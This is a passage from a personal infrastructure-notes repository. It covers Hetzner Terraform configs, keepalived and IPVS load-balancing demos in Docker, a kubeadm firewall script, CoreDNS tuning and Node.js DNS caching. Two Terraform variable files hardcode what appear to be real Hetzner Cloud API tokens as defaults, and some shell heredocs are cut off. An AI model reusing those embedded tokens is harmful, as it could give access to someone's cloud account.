${hcloud_server.nginx1.id}" 18 | } 19 | -------------------------------------------------------------------------------- /2019-08-06-hetzner-cloud-internal-failover-ip/tf/variables.tf: -------------------------------------------------------------------------------- 1 | variable "hcloud_token" { 2 | type = string 3 | description = "Hetzner Cloud API Token" 4 | 5 | default = "xKUf7qJRrGUNKmDsn5RgrfXt2xgy90rSOhElVGZm18tx3nhTYCqgLVwIHR0mKn0y" 6 | } 7 | 8 | variable "ssh_keys" { 9 | type = map(string) 10 | description = "Map of SSH Keys on servers by default, name => key" 11 | 12 | default = { 13 | "Kirill Fomichev" = "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDrN2DVTlDzXklIDAkvet62Ve5uQPNpCCc0EG9JjGBzpWGy80r1KLgJgas5xLJYGZaygfuxY6Iij3mZ3QHVbCa3XITjojR8v53jUGXQ0Ouo/D3VaBdRqeno7iJu6GsWKfVo15duf49f4AB98pj7BqXcHxj8xyxLSb2keUwvi7ugJb3KDpEjdWprajN92Uj/uT4PpDM5xrSRb1QVwXJ0XWz8TKZKlhH0xD3UWjLEhQjOk6PO31Dcip+k9waxyJGlmLy/c7Z8KA5gOzGbpN3q1phV4OPzKj6RlkJj0YY1Lvqt8aV4QqLfKFatBGL0+5GyEkckWUsJkXbmcaVbMvXU0Oqb fanatid@ya.ru" 14 | } 15 | } 16 | -------------------------------------------------------------------------------- /2019-08-18-loadbalancer-iptables-ipvs/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM nginx:1.17.2-alpine 2 | 3 | RUN apk add --no-cache curl iptables ipvsadm tcpdump 4 | -------------------------------------------------------------------------------- /2019-08-18-loadbalancer-iptables-ipvs/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | 3 | services: 4 | balancer0: 5 | build: . 6 | hostname: balancer0 7 | networks: 8 | loadbalancer: 9 | ipv4_address: 172.31.0.2 10 | cap_add: 11 | - NET_ADMIN 12 | command: sh -c "while true; do sleep 1; done" 13 | stop_signal: SIGKILL 14 | restart: on-failure 15 | 16 | nginx0: 17 | build: . 18 | hostname: nginx0 19 | networks: 20 | loadbalancer: 21 | ipv4_address: 172.31.2.0 22 | cap_add: 23 | - NET_ADMIN 24 | sysctls: 25 | net.ipv4.conf.eth0.arp_ignore: 1 26 | net.ipv4.conf.eth0.arp_announce: 2 27 | command: sh -c 'ln -sf /etc/hostname /usr/share/nginx/html/index.html && nginx -g "daemon off;"' 28 | restart: on-failure 29 | 30 | nginx1: 31 | build: . 
32 | hostname: nginx1 33 | networks: 34 | loadbalancer: 35 | ipv4_address: 172.31.2.1 36 | cap_add: 37 | - NET_ADMIN 38 | sysctls: 39 | net.ipv4.conf.eth0.arp_ignore: 1 40 | net.ipv4.conf.eth0.arp_announce: 2 41 | command: sh -c 'ln -sf /etc/hostname /usr/share/nginx/html/index.html && nginx -g "daemon off;"' 42 | restart: on-failure 43 | 44 | networks: 45 | loadbalancer: 46 | ipam: 47 | config: 48 | - subnet: 172.31.0.0/16 49 | -------------------------------------------------------------------------------- /2019-08-18-virtual-server-with-keepalived/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM nginx:1.17.2-alpine 2 | 3 | RUN apk add --no-cache keepalived 4 | 5 | COPY ./keepalived.conf /etc/keepalived/keepalived.conf 6 | -------------------------------------------------------------------------------- /2019-08-18-virtual-server-with-keepalived/README.md: -------------------------------------------------------------------------------- 1 | # Virtual Server with keepalived 2 | 3 | I already described how to set up a [failover IP with keepalived](../2019-08-06-hetzner-cloud-internal-failover-ip) and how to use [IPVS](../2019-08-18-loadbalancer-iptables-ipvs) for load balancing, but keepalived can also be used for a Virtual Server, and this note shows how to do it. 4 | 5 | ## Infrastructure 6 | 7 | In this note we will use docker containers again; it's enough for a demonstration. 8 | 9 | The Docker image ([Dockerfile](./Dockerfile)) is built on `nginx:1.17.2-alpine`; we also add [keepalived](https://www.keepalived.org/) and copy [keepalived.conf](./keepalived.conf) to `/etc/keepalived/keepalived.conf`. 10 | 11 | [docker-compose.yml](./docker-compose.yml) defines 4 containers: 2 nginx and 2 virtual servers (it is possible, and better, to locate nginx and the virtual server on one instance, but for a demonstration in containers it is easier to keep them separate). 12 | 13 | - `nginx0` — `172.31.1.0` 14 | - `nginx1` — `172.31.1.1` 15 | - `vs0` — `172.31.2.0` 16 | - `vs1` — `172.31.2.1` 17 | 18 | Our Virtual IP will be `172.31.2.2`. All containers need the `NET_ADMIN` capability, because we do network management in each of them. The NGINX containers also have sysctl options for ARP, and they add our Virtual IP to the loopback interface on container startup. They also link the hostname to `index.html`, so the launched [NGINX](https://www.nginx.com/) responds with the container hostname. The `vs` containers adjust `keepalived.conf` on startup and run `keepalived` without daemonization. 19 | 20 | For starting and stopping you can use: 21 | 22 | ```bash 23 | docker-compose -p keepalived up --build -d 24 | docker-compose -p keepalived down 25 | ``` 26 | 27 | ### keepalived.conf 28 | 29 | The most important thing in this note is [keepalived.conf](./keepalived.conf). 30 | 31 | In the `vrrp_instance` section we define the instance `nginx` with Virtual IP `172.31.2.2/32`, which should be attached to `eth0`. We also have the 2 IPs of the `vs` containers in `unicast_peer`, but on startup the IP of the starting container is commented out, so `keepalived` in this container will ping only the other peer. 32 | 33 | In the other section, `virtual_server`, we define a Virtual Server on our Virtual IP on port 80 (`172.31.2.2:80`). We also define two real servers at `172.31.1.0` / `172.31.1.1`, and we can do this only on port 80 because we use DR mode for IPVS.
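Under the hood `keepalived` programs these `virtual_server` entries into the kernel IPVS table. You can inspect it with `ipvsadm` inside a `vs` container (it is not included in the image used here, so install it first); the output should look roughly like this:

```bash
docker exec keepalived_vs0_1 apk add --no-cache ipvsadm
docker exec keepalived_vs0_1 ipvsadm -L -n

# IP Virtual Server version 1.2.1 (size=4096)
# Prot LocalAddress:Port Scheduler Flags
#   -> RemoteAddress:Port           Forward Weight ActiveConn InActConn
# TCP  172.31.2.2:80 rr
#   -> 172.31.1.0:80                Route   1      0          0
#   -> 172.31.1.1:80                Route   1      0          0
```

`Route` is how `ipvsadm` displays the DR forwarding method, and `rr` matches `lvs_sched` from the config.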
34 | 35 | ### Observing 36 | 37 | Let's start all containers and follow the logs of the `vs` containers: 38 | 39 | ```bash 40 | docker logs -f keepalived_vs0_1 41 | docker logs -f keepalived_vs1_1 42 | ``` 43 | 44 | In my case `keepalived_vs1_1` entered the MASTER state, which means that this container holds our Virtual IP right now. From the host system: 45 | 46 | ```bash 47 | $ for i in $(seq 1 5); do curl 172.31.2.2; done 48 | nginx1 49 | nginx0 50 | nginx1 51 | nginx0 52 | nginx1 53 | ``` 54 | 55 | Now, let's stop the first NGINX container and run `curl` in a loop again: 56 | 57 | ```bash 58 | $ docker stop keepalived_nginx0_1 59 | $ for i in $(seq 1 5); do curl 172.31.2.2; done 60 | nginx1 61 | nginx1 62 | nginx1 63 | nginx1 64 | nginx1 65 | ``` 66 | 67 | `keepalived` discovered that the `HTTP_GET` check for the real server failed and removed the service from the list; in the logs: 68 | 69 | ```bash 70 | Sun Aug 18 19:03:04 2019: HTTP_CHECK on service [172.31.1.0]:tcp:80 failed after 1 retry. 71 | Sun Aug 18 19:03:04 2019: Removing service [172.31.1.0]:tcp:80 to VS [172.31.2.2]:tcp:80 72 | ``` 73 | 74 | Now let's stop the container in the MASTER state and run `curl` in a loop again: 75 | 76 | ```bash 77 | $ docker stop keepalived_vs1_1 78 | $ for i in $(seq 1 5); do curl 172.31.2.2; done 79 | nginx1 80 | nginx1 81 | nginx1 82 | nginx1 83 | nginx1 84 | ``` 85 | 86 | Everything still works, but now the Virtual IP is located on `keepalived_vs0_1`; in the logs: 87 | 88 | ```bash 89 | Sun Aug 18 19:06:52 2019: (nginx) Entering MASTER STATE 90 | Sun Aug 18 19:06:52 2019: (nginx) setting VIPs. 91 | Sun Aug 18 19:06:52 2019: Sending gratuitous ARP on eth0 for 172.31.2.2 92 | ``` 93 | 94 | Now let's bring the stopped first NGINX container back to life and run `curl` in a loop: 95 | 96 | ```bash 97 | $ docker start keepalived_nginx0_1 98 | $ for i in $(seq 1 5); do curl 172.31.2.2; done 99 | nginx0 100 | nginx1 101 | nginx0 102 | nginx1 103 | nginx0 104 | ``` 105 | 106 | in the logs of `keepalived_vs0_1`: 107 | 108 | ```bash 109 | Sun Aug 18 19:08:55 2019: HTTP status code success to [172.31.1.0]:tcp:80 url(1). 110 | Sun Aug 18 19:08:55 2019: Remote Web server [172.31.1.0]:tcp:80 succeed on service. 111 | Sun Aug 18 19:08:55 2019: Adding service [172.31.1.0]:tcp:80 to VS [172.31.2.2]:tcp:80 112 | ``` 113 | 114 | ### Result 115 | 116 | With these actions we can see that the probes and the Virtual IP changes work. Of course, failover is not instant; it takes a few seconds for both the Virtual Server and the Virtual IP, but such events should not happen too often, so this is probably enough in most cases. 117 | -------------------------------------------------------------------------------- /2019-08-18-virtual-server-with-keepalived/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | 3 | services: 4 | nginx0: 5 | build: . 6 | hostname: nginx0 7 | networks: 8 | keepalived: 9 | ipv4_address: 172.31.1.0 10 | cap_add: 11 | - NET_ADMIN 12 | sysctls: 13 | net.ipv4.conf.eth0.arp_ignore: 1 14 | net.ipv4.conf.eth0.arp_announce: 2 15 | command: sh -c 'ip address add 172.31.2.2/32 dev lo && ln -sf /etc/hostname /usr/share/nginx/html/index.html && nginx -g "daemon off;"' 16 | restart: on-failure 17 | 18 | nginx1: 19 | build: .
20 | hostname: nginx1 21 | networks: 22 | keepalived: 23 | ipv4_address: 172.31.1.1 24 | cap_add: 25 | - NET_ADMIN 26 | sysctls: 27 | net.ipv4.conf.eth0.arp_ignore: 1 28 | net.ipv4.conf.eth0.arp_announce: 2 29 | command: sh -c 'ip address add 172.31.2.2/32 dev lo && ln -sf /etc/hostname /usr/share/nginx/html/index.html && nginx -g "daemon off;"' 30 | restart: on-failure 31 | 32 | vs0: 33 | build: . 34 | hostname: vs0 35 | networks: 36 | keepalived: 37 | ipv4_address: 172.31.2.0 38 | cap_add: 39 | - NET_ADMIN 40 | command: sh -c 'sed -i "s/172.31.2.0/# 172.31.2.0/" /etc/keepalived/keepalived.conf && keepalived -l -D -n' 41 | restart: on-failure 42 | 43 | vs1: 44 | build: . 45 | hostname: vs1 46 | networks: 47 | keepalived: 48 | ipv4_address: 172.31.2.1 49 | cap_add: 50 | - NET_ADMIN 51 | command: sh -c 'sed -i "s/172.31.2.1/# 172.31.2.1/" /etc/keepalived/keepalived.conf && keepalived -l -D -n' 52 | restart: on-failure 53 | 54 | networks: 55 | keepalived: 56 | ipam: 57 | config: 58 | - subnet: 172.31.0.0/16 59 | -------------------------------------------------------------------------------- /2019-08-18-virtual-server-with-keepalived/keepalived.conf: -------------------------------------------------------------------------------- 1 | vrrp_instance nginx { 2 | state BACKUP 3 | interface eth0 4 | unicast_peer { 5 | 172.31.2.0 6 | 172.31.2.1 7 | } 8 | virtual_router_id 42 9 | priority 100 10 | virtual_ipaddress { 11 | 172.31.2.2/32 dev eth0 12 | } 13 | nopreempt 14 | } 15 | 16 | virtual_server 172.31.2.2 80 { 17 | lvs_sched rr 18 | lvs_method DR 19 | protocol TCP 20 | connect_timeout 2 21 | delay_loop 1 22 | real_server 172.31.1.0 80 { 23 | HTTP_GET { 24 | url { 25 | path / 26 | status_code 200 27 | } 28 | connect_ip 172.31.1.0 29 | connect_port 80 30 | } 31 | } 32 | real_server 172.31.1.1 80 { 33 | HTTP_GET { 34 | url { 35 | path / 36 | status_code 200 37 | } 38 | connect_ip 172.31.1.1 39 | connect_port 80 40 | } 41 | } 42 | } 43 | -------------------------------------------------------------------------------- /2019-08-19-kubernetes-setup-with-kubeadm/tf/main.tf: -------------------------------------------------------------------------------- 1 | provider "hcloud" { 2 | version = "~> 1.11" 3 | token = "${var.hcloud_token}" 4 | } 5 | 6 | # SSH keys 7 | resource "hcloud_ssh_key" "default" { 8 | count = "${length(var.ssh_keys)}" 9 | 10 | name = "${keys(var.ssh_keys)[count.index]}" 11 | public_key = "${values(var.ssh_keys)[count.index]}" 12 | } 13 | 14 | # Private Network and subnets 15 | resource "hcloud_network" "default" { 16 | name = "kubernetes" 17 | ip_range = "10.0.0.0/8" 18 | } 19 | 20 | resource "hcloud_network_subnet" "master" { 21 | network_id = "${hcloud_network.default.id}" 22 | type = "server" 23 | network_zone = "eu-central" 24 | ip_range = "10.0.1.0/24" 25 | } 26 | 27 | resource "hcloud_network_subnet" "worker" { 28 | network_id = "${hcloud_network.default.id}" 29 | type = "server" 30 | network_zone = "eu-central" 31 | ip_range = "10.0.2.0/24" 32 | } 33 | 34 | # Control planes (master) 35 | resource "hcloud_server" "master_loadbalancer" { 36 | name = "master-loadbalancer" 37 | image = "ubuntu-18.04" 38 | server_type = "cx11-ceph" 39 | user_data = "${file("./user-data/default.sh")}" 40 | ssh_keys = "${hcloud_ssh_key.default[*].name}" 41 | } 42 | 43 | resource "hcloud_server_network" "master_loadbalancer_network" { 44 | network_id = "${hcloud_network.default.id}" 45 | server_id = "${hcloud_server.master_loadbalancer.id}" 46 | ip = "10.0.1.1" 47 | } 48 | 49 | resource "hcloud_server" 
"master" { 50 | count = 3 51 | 52 | name = "master${count.index}" 53 | image = "ubuntu-18.04" 54 | server_type = "cx31-ceph" 55 | user_data = "${file("./user-data/default.sh")}" 56 | ssh_keys = "${hcloud_ssh_key.default[*].name}" 57 | } 58 | 59 | resource "hcloud_server_network" "master_network" { 60 | count = length(hcloud_server.master) 61 | 62 | network_id = "${hcloud_network.default.id}" 63 | server_id = "${hcloud_server.master[count.index].id}" 64 | ip = "10.0.1.${count.index + 2}" 65 | } 66 | 67 | # Worker 68 | resource "hcloud_server" "worker" { 69 | count = 2 70 | 71 | name = "worker${count.index}" 72 | image = "ubuntu-18.04" 73 | server_type = "cx31-ceph" 74 | user_data = "${file("./user-data/default.sh")}" 75 | ssh_keys = "${hcloud_ssh_key.default[*].name}" 76 | } 77 | 78 | resource "hcloud_server_network" "worker_network" { 79 | count = length(hcloud_server.worker) 80 | 81 | network_id = "${hcloud_network.default.id}" 82 | server_id = "${hcloud_server.worker[count.index].id}" 83 | ip = "10.0.2.${count.index + 1}" 84 | } 85 | -------------------------------------------------------------------------------- /2019-08-19-kubernetes-setup-with-kubeadm/tf/outputs.tf: -------------------------------------------------------------------------------- 1 | output "master_loadbalancer_ipv4" { 2 | description = "Public ipv4 address of master loadbalancer" 3 | value = "${hcloud_server_network.master_loadbalancer_network.ip} => ${hcloud_server.master_loadbalancer.ipv4_address}" 4 | } 5 | 6 | output "master_ipv4" { 7 | description = "Map of private ipv4 to public ipv4 for masters" 8 | value = { for i in range(length(hcloud_server.master)) : hcloud_server_network.master_network[i].ip => hcloud_server.master[i].ipv4_address } 9 | } 10 | 11 | output "worker_ipv4" { 12 | description = "Map of private ipv4 to public ipv4 for workers" 13 | value = { for i in range(length(hcloud_server.worker)) : hcloud_server_network.worker_network[i].ip => hcloud_server.worker[i].ipv4_address } 14 | } 15 | -------------------------------------------------------------------------------- /2019-08-19-kubernetes-setup-with-kubeadm/tf/user-data/default.sh: -------------------------------------------------------------------------------- 1 | #cloud-config 2 | packages: 3 | - python 4 | - iptables-persistent 5 | runcmd: 6 | - iptables -A INPUT -i eth0 -p tcp --dport 22 -j ACCEPT # Allow SSH 7 | - iptables -A INPUT -i eth0 -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT # Allow ESTABLISHED 8 | - iptables -A INPUT -i eth0 -p icmp -j ACCEPT # Allow ICMP 9 | - iptables -A INPUT -i eth0 -j REJECT # Reject rest 10 | - iptables-save > /etc/iptables/rules.v4 # Save ipv4 rules 11 | 12 | - ip6tables -A INPUT -i eth0 -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT # Allow ESTABLISHED 13 | - ip6tables -A INPUT -i eth0 -p icmpv6 -j ACCEPT # Allow ICMP 14 | - ip6tables -A INPUT -i eth0 -j REJECT # Reject rest 15 | - ip6tables-save > /etc/iptables/rules.v6 # Save ipv6 rules 16 | -------------------------------------------------------------------------------- /2019-08-19-kubernetes-setup-with-kubeadm/tf/variables.tf: -------------------------------------------------------------------------------- 1 | variable "hcloud_token" { 2 | type = string 3 | description = "Hetzner Cloud API Token" 4 | 5 | default = "VKzclT5C6NFdkfkT3dLUeEkPYgjDYBuKfUnv8iBi6wiEAURRmCZR5rElr5rtNvB1" 6 | } 7 | 8 | variable "ssh_keys" { 9 | type = map(string) 10 | description = "Map of SSH Keys on servers by default, name => key" 11 | 12 | default = { 13 | 
"Kirill Fomichev" = "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDrN2DVTlDzXklIDAkvet62Ve5uQPNpCCc0EG9JjGBzpWGy80r1KLgJgas5xLJYGZaygfuxY6Iij3mZ3QHVbCa3XITjojR8v53jUGXQ0Ouo/D3VaBdRqeno7iJu6GsWKfVo15duf49f4AB98pj7BqXcHxj8xyxLSb2keUwvi7ugJb3KDpEjdWprajN92Uj/uT4PpDM5xrSRb1QVwXJ0XWz8TKZKlhH0xD3UWjLEhQjOk6PO31Dcip+k9waxyJGlmLy/c7Z8KA5gOzGbpN3q1phV4OPzKj6RlkJj0YY1Lvqt8aV4QqLfKFatBGL0+5GyEkckWUsJkXbmcaVbMvXU0Oqb fanatid@ya.ru" 14 | } 15 | } 16 | -------------------------------------------------------------------------------- /2019-08-20-k8s-coredns-tune-for-external-domains/README.md: -------------------------------------------------------------------------------- 1 | # CoreDNS tune for external domains in Kubernetes 2 | 3 | - [Pod for tests](#pod-for-tests) 4 | - [Problem first](#problem-first) 5 | - [Solution](#solution) 6 | - [Resources](#resources) 7 | 8 | In this note we will need [Kubernetes](https://kubernetes.io/) cluster for experiments, you can check previous note [Kubernetes setup with kubeadm](https://github.com/fanatid/notes/tree/master/2019-08-19-kubernetes-setup-with-kubeadm), or 9 | 10 |
11 | use this small summary note for installing Kubernetes on one machine 12 | 13 | ```bash 14 | # Close ports with iptables 15 | apt install -y python iptables-persistent 16 | 17 | iptables -A INPUT -i eth0 -p tcp --dport 22 -j ACCEPT # Allow SSH 18 | iptables -A INPUT -i eth0 -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT # Allow ESTABLISHED 19 | iptables -A INPUT -i eth0 -p icmp -j ACCEPT # Allow ICMP 20 | iptables -A INPUT -i eth0 -j REJECT # Reject rest 21 | iptables-save > /etc/iptables/rules.v4 # Save ipv4 rules 22 | 23 | ip6tables -A INPUT -i eth0 -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT # Allow ESTABLISHED 24 | ip6tables -A INPUT -i eth0 -p icmpv6 -j ACCEPT # Allow ICMP 25 | ip6tables -A INPUT -i eth0 -j REJECT # Reject rest 26 | ip6tables-save > /etc/iptables/rules.v6 # Save ipv6 rules 27 | 28 | # Install CRI (Docker) 29 | curl -fsSL https://download.docker.com/linux/ubuntu/gpg | apt-key add - 30 | add-apt-repository "deb [arch=amd64] https://download.docker.com/linux/ubuntu $(lsb_release -cs) stable" 31 | apt-get install -y docker-ce=5:18.09.8~3-0~ubuntu-bionic 32 | apt-mark hold docker-ce 33 | 34 | # Change Docker config and restart it 35 | cat > /etc/docker/daemon.json </dev/null 2>&1 && source <(kubeadm completion bash) && echo "which kubeadm 1>/dev/null 2>&1 && source <(kubeadm completion bash)" >> ~/.bashrc 57 | which kubectl 1>/dev/null 2>&1 && source <(kubectl completion bash) && echo "which kubectl 1>/dev/null 2>&1 && source <(kubectl completion bash)" >> ~/.bashrc 58 | 59 | # Create config for kubeadm init 60 | cat >./cluster.yaml < 96 | 97 | ### Pod for tests 98 | 99 | For testing DNS in pods I propose using the [infoblox/dnstools](https://hub.docker.com/r/infoblox/dnstools) container: 100 | 101 | ```bash 102 | kubectl apply -f - < 10.96.0.10.53: 51855+ [1au] A? google.com.default.svc.cluster.local. (77) 139 | 18:44:10.554605 IP 10.96.0.10.53 > 10.244.0.24.59479: 51855 NXDomain*- 0/1/1 (170) 140 | 18:44:10.555325 IP 10.244.0.24.33612 > 10.96.0.10.53: 60060+ [1au] A? google.com.svc.cluster.local. (69) 141 | 18:44:10.555674 IP 10.96.0.10.53 > 10.244.0.24.33612: 60060 NXDomain*- 0/1/1 (162) 142 | 18:44:10.556033 IP 10.244.0.24.48711 > 10.96.0.10.53: 56924+ [1au] A? google.com.cluster.local. (65) 143 | 18:44:10.556304 IP 10.96.0.10.53 > 10.244.0.24.48711: 56924 NXDomain*- 0/1/1 (158) 144 | 18:44:10.556611 IP 10.244.0.24.59575 > 10.96.0.10.53: 39260+ [1au] A? google.com. (51) 145 | 18:44:10.556851 IP 10.96.0.10.53 > 10.244.0.24.59575: 39260 1/0/1 A 216.58.205.238 (77) 146 | ``` 147 | 148 | Why? Because if you check `/etc/resolv.conf`, you will find: 149 | 150 | ```bash 151 | nameserver 10.96.0.10 152 | search default.svc.cluster.local svc.cluster.local cluster.local 153 | options ndots:5 154 | ``` 155 | 156 | `ndots:5` is important here, from the [resolv.conf man page](https://linux.die.net/man/5/resolv.conf): 157 | 158 | > ndots:n 159 | > 160 | > sets a threshold for the number of dots which must appear in a name given to res_query(3) (see resolver(3)) before an initial absolute query will be made. The default for n is 1, meaning that if there are any dots in a name, the name will be tried first as an absolute name before any search list elements are appended to it. The value for this option is silently capped to 15. 161 | 162 | which means that if a name contains fewer than 5 dots, the local search domains will be tried first: 163 | 164 | ```bash 165 | google.com.default.svc.cluster.local. -> NXDOMAIN 166 | google.com.svc.cluster.local. -> NXDOMAIN 167 | google.com.cluster.local.
-> NXDOMAIN 168 | google.com. -> A 169 | ``` 170 | 171 | If you have a lot of outgoing traffic, this means that every name resolution will produce 4 DNS queries instead of 1 (or 8 instead of 2 if both IPv4 & IPv6 are used). 172 | 173 | ### Solution 174 | 175 | If you want to solve this only for a specific pod, you can define `dnsConfig` in the pod spec: https://kubernetes.io/docs/concepts/services-networking/dns-pod-service/#pod-s-dns-config 176 | 177 | But it is better to solve it at the [CoreDNS](https://kubernetes.io/docs/tasks/administer-cluster/dns-custom-nameservers/#coredns) level, because this also improves record validation for pods. 178 | 179 | To change the CoreDNS config we need to edit its ConfigMap: 180 | 181 | ```bash 182 | kubectl edit -n kube-system configmap coredns 183 | ``` 184 | 185 | and change the `Corefile`: 186 | 187 | - Add `autopath @kubernetes`. `autopath` will follow the chain of search path elements and return the first reply that is not NXDOMAIN. 188 | - Change `pods` in the `kubernetes` plugin to `verified` instead of `insecure`. In this case CoreDNS will track all existing pods. `insecure` is used by default for backward compatibility with [kube-dns](https://kubernetes.io/docs/tasks/administer-cluster/dns-custom-nameservers/#kube-dns). 189 | 190 | Because the `Corefile` includes the [reload](https://coredns.io/plugins/reload/) plugin, `CoreDNS` in the pods will reload the config itself (by default with a 30s interval and 15s jitter). 191 | 192 | After reloading (you can track this with a command like `kubectl logs -n kube-system -f coredns-5c98db65d4-fv2jt`): 193 | 194 | ```bash 195 | dnstools# dig google.com +search A 196 | ... 197 | ;; ANSWER SECTION: 198 | google.com.default.svc.cluster.local. 30 IN CNAME google.com. 199 | google.com. 30 IN A 216.58.205.238 200 | ... 201 | ``` 202 | 203 | and `tcpdump` shows only 1 DNS query: 204 | 205 | ```bash 206 | 18:48:27.643399 IP 10.244.0.24.47595 > 10.96.0.10.53: 45594+ [1au] A? google.com.default.svc.cluster.local. (77) 207 | 18:48:27.643759 IP 10.96.0.10.53 > 10.244.0.24.47595: 45594 2/0/1 CNAME google.com., A 216.58.205.238 (163) 208 | ``` 209 | 210 | ### Resources 211 | 212 | - `CoreDNS GA for Kubernetes Cluster DNS`: https://kubernetes.io/blog/2018/07/10/coredns-ga-for-kubernetes-cluster-dns/ 213 | - `Customizing DNS Service`: https://kubernetes.io/docs/tasks/administer-cluster/dns-custom-nameservers/ 214 | - `Configuring Private DNS Zones and Upstream Nameservers in Kubernetes`: https://kubernetes.io/blog/2017/04/configuring-private-dns-zones-upstream-nameservers-kubernetes/ 215 | - `DNS for Services and Pods`: https://kubernetes.io/docs/concepts/services-networking/dns-pod-service/ 216 | - `Custom DNS Entries For Kubernetes`: https://coredns.io/2017/05/08/custom-dns-entries-for-kubernetes/ 217 | - `CoreDNS, plugin kubernetes`: https://coredns.io/plugins/kubernetes/ 218 | - `CoreDNS, plugin autopath`: https://coredns.io/plugins/autopath/ 219 | - `infoblox/dnstools`: https://hub.docker.com/r/infoblox/dnstools 220 | -------------------------------------------------------------------------------- /2019-08-22-nodejs-dns/README.md: -------------------------------------------------------------------------------- 1 | # DNS in Node.js 2 | 3 | Currently the latest release is [v12.9.0](https://nodejs.org/en/blog/release/v12.9.0/), so all links refer to this version.
4 | 5 | ### Local DNS Server 6 | 7 | Probably the simplest way to run a local DNS server is to run [CoreDNS](https://coredns.io/) in [Docker](https://docker.com/) (configs are already in the [coredns folder](./coredns)): 8 | 9 | ```bash 10 | docker run -it --rm -v $(pwd)/coredns:/etc/coredns:ro -w /etc/coredns -p 127.0.0.2:53:53/udp coredns/coredns:1.6.2 11 | ``` 12 | 13 | The config defines two records: 14 | 15 | - `a.example.com` — `A` (`127.0.0.1`) 16 | - `b.example.com` — `CNAME` (`a.example.com`) 17 | 18 | To test the launched server: 19 | 20 | ```bash 21 | dig +noall b.example.com @127.0.0.2 +answer 22 | b.example.com. 0 IN CNAME a.example.com. 23 | a.example.com. 0 IN A 10.0.0.0 24 | ``` 25 | 26 | ### Node.js 27 | 28 | [Node.js](https://nodejs.org/) provides two implementations: `dns.lookup` and the various `dns.resolve*()`/`dns.reverse()` functions. See the docs: https://nodejs.org/docs/v12.9.0/api/dns.html#dns_implementation_considerations 29 | 30 | The difference between them is that `dns.lookup` uses the synchronous [getaddrinfo(3)](http://man7.org/linux/man-pages/man3/getaddrinfo.3.html) call. The result will be the same as for most other programs. But a synchronous call means that the [UV Thread Pool](http://docs.libuv.org/en/v1.x/threadpool.html) is used and the `UV_THREADPOOL_SIZE` value is important. By default the networking API in Node.js uses this implementation. 31 | 32 | The second implementation, `dns.resolve*()`, uses [c-ares](https://c-ares.haxx.se/), where DNS queries always use the network. This network communication is always asynchronous, so the libuv threadpool is not used. 33 | 34 | Source code: 35 | 36 | - `dns.lookup` dispatch: https://github.com/nodejs/node/blob/v12.9.0/src/cares_wrap.cc#L1987 37 | - `c-ares` query: https://github.com/nodejs/node/blob/v12.9.0/src/cares_wrap.cc#L611 38 | 39 | ### Tests 40 | 41 | For testing the local DNS server with `dns.lookup()` you will need to change `resolv.conf`: 42 | 43 | ```bash 44 | cat > /etc/resolv.conf < { 98 | cache.delete(key) 99 | 100 | for (const callback of callbacks) { 101 | process.nextTick(callback, err, address, family) 102 | } 103 | }) 104 | cache.set(key, { callbacks, reqWrap }) 105 | 106 | return reqWrap 107 | } 108 | } 109 | ``` 110 | 111 | The idea of such a "cached" function is simple. If `dns.lookup` is already executing for the same arguments at the current time, we do not create another such request; instead we save the callback to be called later with the result. Once `dns.lookup` calls our callback we remove the data from the "cache", i.e. instead of storing the result of the lookup we "merge" all identical requests. 112 | 113 | The result of such a function: 114 | 115 | ```bash 116 | $ UV_THREADPOOL_SIZE=4 node js/dns-lookup-cache.js 117 | Elapsed time: 246.458ms 118 | ``` 119 | 120 | The elapsed time does not go to zero because we send requests in chunks (100 items) with 100k requests in total, i.e. with such a function we still do 1000 lookups (`100000 / 100 = 1000`).
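Such a merging function can be plugged in anywhere Node.js accepts a custom `lookup` option (covered in more detail below). A small usage sketch, assuming the `createLookupCache` from above is in scope:

```js
const http = require('http')

const lookup = createLookupCache()
// concurrent requests to the same host now share a single getaddrinfo call
http.get({ host: 'a.example.com', port: 80, family: 4, lookup }, (res) => res.resume())
  .on('error', console.error)
```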
If you still have a problem with this number of requests, you can use a similar function with a real cache, but the TTL should be as small as possible:

```js
function createLookupCache (ttl = 10) {
  const cache = new Map()
  let nextCleanUp = Date.now() + 2 * ttl

  return function dnslookup (hostname, options, callback) {
    if (typeof options === 'function') {
      callback = options
      options = { family: 0 }
    }

    const now = Date.now()
    if (nextCleanUp < now) {
      for (const [key, { validUpTo }] of cache.entries()) {
        if (validUpTo < now) cache.delete(key)
      }

      nextCleanUp = now + 2 * ttl
    }

    const key = `${hostname};${JSON.stringify(options)}`
    const cachedLookup = cache.get(key)
    if (cachedLookup !== undefined && !(cachedLookup.result !== null && cachedLookup.validUpTo < now)) {
      if (cachedLookup.result === null) cachedLookup.callbacks.push(callback)
      else process.nextTick(callback, ...cachedLookup.result)

      return cachedLookup.reqWrap
    }

    const callbacks = [callback]
    const reqWrap = dns.lookup(hostname, options, (err, address, family) => {
      for (const callback of callbacks) {
        process.nextTick(callback, err, address, family)
      }

      const obj = cache.get(key)
      obj.result = [err, address, family]
      obj.validUpTo = Date.now() + ttl
    })
    cache.set(key, { callbacks, reqWrap, result: null, validUpTo: null })

    return reqWrap
  }
}
```

```bash
$ UV_THREADPOOL_SIZE=4 node js/dns-lookup-cache2.js
Elapsed time: 105.517ms
```

### dgram / net / http

The network API in Node.js uses `dns.lookup()`, but we can redefine it.

##### dgram

For UDP we can pass a `lookup` function to `dgram.createSocket`, see [docs](https://nodejs.org/api/dgram.html#dgram_dgram_createsocket_options_callback) / [source code](https://github.com/nodejs/node/blob/v12.9.0/lib/internal/dgram.js#L21-L50).

```js
dgram.createSocket({
  ...
  lookup: dnsCustomLookup
})
```

##### net

In the `net` module a custom `lookup` can be passed to `socket.connect`, see [docs](https://nodejs.org/api/net.html#net_socket_connect_options_connectlistener) / [source code](https://github.com/nodejs/node/blob/v12.9.0/lib/net.js#L940-L958). Optionally you can also pass `family` and `hints` as `dns.lookup()` options. If you plan to use only IPv4 or IPv6, it's better to set `family` to a specific value; this halves the number of DNS queries (the default value `0` produces both `A` and `AAAA` queries).

```js
const sock = new net.Socket()
sock.connect({
  ...
